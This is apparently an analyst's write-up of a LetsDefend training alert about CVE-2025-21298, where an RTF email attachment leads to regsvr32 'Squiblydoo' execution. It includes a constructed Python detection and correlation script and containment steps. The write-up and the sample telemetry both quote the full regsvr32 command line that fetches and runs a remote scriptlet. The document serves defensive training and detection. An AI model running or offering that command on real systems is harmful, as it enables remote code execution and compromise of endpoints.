// soc investigation 2026-02-08
SOC336 Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)
letsdefend Medium closed ✓ true positive
phishing mitre/T1566-001 mitre/T1203 mitre/T1218-010 mitre/T1105 mitre/T1059-003
analyst verdict TRUE POSITIVE

🎯 MITRE ATT&CK

T1566.001 Phishing Attachment
T1203 Exploitation for Client Execution
T1218.010 Regsvr32
T1105 Ingress Tool Transfer
T1059.003 Windows Command Shell

👤 Who

The affected user is Austin@letsdefend.io.
The malicious email was sent from projectmanagement@pm.me via the SMTP source IP 84.38.130.118.
The endpoint executed cmd.exe which launched regsvr32.exe to retrieve a remote payload.

🔎 What

Alert SOC336 detected exploitation of CVE-2025-21298, a Windows OLE zero-click remote code execution vulnerability delivered via a malicious RTF attachment named mail.rtf.
The attachment hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 was confirmed malicious on VirusTotal.
The endpoint executed the command C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll.
This is the living-off-the-land technique commonly known as Squiblydoo: the Microsoft-signed regsvr32.exe is invoked silently (/s) with an install string (/i:) pointing at a remote URL and scrobj.dll as the target library, so scrobj.dll fetches the scriptlet and runs the script inside it without any unsigned binary touching disk.

🕐 When

The alert triggered on Feb 04, 2025 at 04:18 PM.

📍 Where

The attack targeted the endpoint belonging to Austin@letsdefend.io.
Network logs confirm a successful HTTP GET request to http://84.38.130.118.com/shell.sct. The malicious infrastructure is associated with IP address 84.38.130.118.
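To show how the process-creation evidence in the What section and the HTTP evidence in the Where section are tied together, here is an added detection example (not code from the LetsDefend alert or any vendor product). The two event lists are constructed to mirror the command line and URL quoted above; their field names (ts, host, parent, cmdline, src_host, url, status) are assumed rather than any real SIEM schema, so map them to your own telemetry before use.

```python
"""Hunt for regsvr32 'Squiblydoo' scriptlet execution and confirm the download."""
import re
from datetime import datetime, timedelta

# Constructed sample process-creation telemetry (not the case's real logs).
PROCESS_EVENTS = [
    {   # the chain from the alert: Outlook -> cmd.exe -> regsvr32 with a remote .sct
        "ts": "2025-02-04T16:18:02", "host": "austin-pc", "user": "Austin",
        "parent": "OUTLOOK.EXE",
        "cmdline": r"C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll",
    },
    {   # benign: an installer registering a local COM DLL
        "ts": "2025-02-04T16:20:10", "host": "build-01", "user": "svc_build",
        "parent": "msiexec.exe",
        "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\comp.dll",
    },
    {   # local scriptlet through scrobj.dll: still T1218.010, but nothing to fetch
        "ts": "2025-02-04T17:02:41", "host": "lab-07", "user": "tester",
        "parent": "explorer.exe",
        "cmdline": r"regsvr32.exe /s /i:C:\Temp\local.sct scrobj.dll",
    },
]

# Constructed sample proxy/HTTP telemetry.
HTTP_EVENTS = [
    {"ts": "2025-02-04T16:18:03", "src_host": "austin-pc", "method": "GET",
     "url": "http://84.38.130.118.com/shell.sct", "status": 200},
    {"ts": "2025-02-04T16:18:05", "src_host": "austin-pc", "method": "GET",
     "url": "http://www.example.com/index.html", "status": 200},
]

# regsvr32 or regsvr32.exe as its own token (start of line, after whitespace,
# a quote or a path separator); switches may be written with '/' or '-'.
REGSVR32_RE = re.compile(r'(?:^|[\s"\\])regsvr32(?:\.exe)?(?=[\s"]|$)', re.IGNORECASE)
INSTALL_ARG_RE = re.compile(r'(?:^|\s)[/-]i:"?([^\s"]+)', re.IGNORECASE)
SCROBJ_RE = re.compile(r"scrobj\.dll", re.IGNORECASE)


def detect_squiblydoo(event):
    """Return a finding for a regsvr32 command line that passes an install
    string via /i:, or None when the command line is not of interest."""
    cmd = event["cmdline"]
    if not REGSVR32_RE.search(cmd):
        return None
    m = INSTALL_ARG_RE.search(cmd)
    if not m:
        return None            # plain DLL (un)registration, e.g. '/s foo.dll'
    target = m.group(1)
    # An http(s) install string is fetched over the network; a UNC path is
    # remote too (SMB) and deserves the same attention.
    remote = target.lower().startswith(("http://", "https://")) or target.startswith("\\\\")
    uses_scrobj = SCROBJ_RE.search(cmd) is not None
    if not (remote or uses_scrobj):
        return None            # /i: with a local string and an ordinary DLL
    return {
        "ts": event["ts"], "host": event["host"], "user": event.get("user"),
        "parent": event.get("parent"), "url": target,
        "remote": remote, "scrobj": uses_scrobj,
        # remote scriptlet loaded through scrobj.dll is the full Squiblydoo pattern
        "severity": "high" if (remote and uses_scrobj) else "medium",
        "technique": "T1218.010",
    }


def correlate_download(finding, http_events, window_s=120):
    """Find the HTTP request for the scriptlet URL from the same host within
    window_s seconds of the process start. Returns the HTTP event or None."""
    if not finding["remote"]:
        return None
    t0 = datetime.fromisoformat(finding["ts"])
    for h in http_events:
        if h["src_host"] != finding["host"] or h["url"].lower() != finding["url"].lower():
            continue
        if abs(datetime.fromisoformat(h["ts"]) - t0) <= timedelta(seconds=window_s):
            return h
    return None


def triage(process_events, http_events):
    """Run detection over process events and mark each finding with whether
    the scriptlet fetch is visible (and succeeded) in the network telemetry."""
    findings = []
    for ev in process_events:
        f = detect_squiblydoo(ev)
        if f is None:
            continue
        hit = correlate_download(f, http_events)
        f["download_confirmed"] = hit is not None and hit.get("status") == 200
        f["http_status"] = hit["status"] if hit else None
        findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(PROCESS_EVENTS, HTTP_EVENTS):
        print(f"{f['ts']} {f['host']} sev={f['severity']} parent={f['parent']} "
              f"url={f['url']} download_confirmed={f['download_confirmed']}")
```

The parent process is carried through into the finding on purpose: regsvr32 spawned under an Office process such as OUTLOOK.EXE is the signal that separates this case from an installer registering a COM component, and a confirmed 200 on the .sct URL is what upgrades "attempted" to "executed" in the verdict.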

💡 Why

The attacker exploited CVE-2025-21298, which allows remote code execution when a specially crafted email is previewed in Microsoft Outlook.
The vulnerability does not require the user to open the attachment, enabling zero-click execution.
The attacker used regsvr32 to bypass application controls and execute remote malicious code.

🛠️ How

A phishing email with a malicious RTF attachment exploiting CVE-2025-21298 was delivered.
Outlook preview triggered the vulnerability and executed code automatically.
The exploit launched cmd.exe which executed regsvr32.exe.
regsvr32 retrieved and executed a remote scriptlet from 84.38.130.118.com.
The endpoint successfully connected to the malicious server and executed the payload, resulting in compromise.

✅ Conclusion

The endpoint is confirmed compromised due to successful exploitation and remote payload execution.
Immediate containment is required: isolate the host, block the malicious domain and IP, purge mail.rtf from the mailbox, and escalate to Incident Response. Confirm that the January 2025 security update that fixes CVE-2025-21298 is installed on the rest of the estate, and hunt for other regsvr32 invocations with a remote /i: install string.